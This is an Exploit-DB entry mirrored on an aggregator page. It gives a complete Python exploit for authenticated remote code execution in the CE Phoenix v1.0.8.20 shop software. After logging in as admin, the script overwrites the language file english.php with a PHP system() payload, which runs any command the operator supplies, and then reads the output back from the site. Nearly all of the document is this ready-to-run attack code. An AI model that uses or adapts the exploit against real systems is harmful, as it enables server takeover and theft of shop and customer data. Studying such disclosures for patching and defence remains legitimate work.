0
[webapps] CE Phoenix v1.0.8.20 - Remote Code Execution
source link: https://www.exploit-db.com/exploits/51957
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CE Phoenix v1.0.8.20 - Remote Code Execution
## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)
## EXPLOIT :
import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep
class colors:
OKBLUE = '\033[94m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'
def entry_banner():
color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
colors.CRED, colors.CBEIGE]
random.shuffle(color_random)
banner = color_random[0] + """
CE Phoenix v1.0.8.20 - Remote Code Execution \n
Author: tmrswrr
"""
for char in banner:
print(char, end='')
sys.stdout.flush()
sleep(0.0045)
def get_formid_and_cookies(session, url):
response = session.get(url, allow_redirects=True)
if response.ok:
soup = BeautifulSoup(response.text, 'html.parser')
formid_input = soup.find('input', {'name': 'formid'})
if formid_input:
return formid_input['value'], session.cookies
return None, None
def perform_exploit(session, url, username, password, command):
print("\n[+] Attempting to exploit the target...")
initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
formid, cookies = get_formid_and_cookies(session, initial_url)
if not formid:
print("[-] Failed to retrieve initial formid.")
return
# Login
print("[+] Performing login...")
login_payload = {
'formid': formid,
'username': username,
'password': password
}
login_headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
'Referer': initial_url
}
login_url = url + "/admin/login.php?action=process"
login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)
if not login_response.ok:
print("[-] Login failed.")
print(login_response.text)
return
print("[+] Login successful.")
new_formid, _ = get_formid_and_cookies(session, login_response.url)
if not new_formid:
print("[-] Failed to retrieve new formid after login.")
return
# Exploit
print("[+] Executing the exploit...")
encoded_command = urllib.parse.quote_plus(command)
exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
exploit_headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
'Referer': login_response.url
}
exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)
if exploit_response.ok:
print("[+] Exploit executed successfully.")
else:
print("[-] Exploit failed.")
print(exploit_response.text)
final_response = session.get(url)
print("\n[+] Executed Command Output:\n")
print(final_response.text)
def main(base_url, username, password, command):
print("\n[+] Starting the exploitation process...")
session = requests.Session()
perform_exploit(session, base_url, username, password, command)
if __name__ == "__main__":
entry_banner()
if len(sys.argv) < 5:
print("Usage: python script.py [URL] [username] [password] [command]")
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
command = sys.argv[4]
main(base_url, username, password, command)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK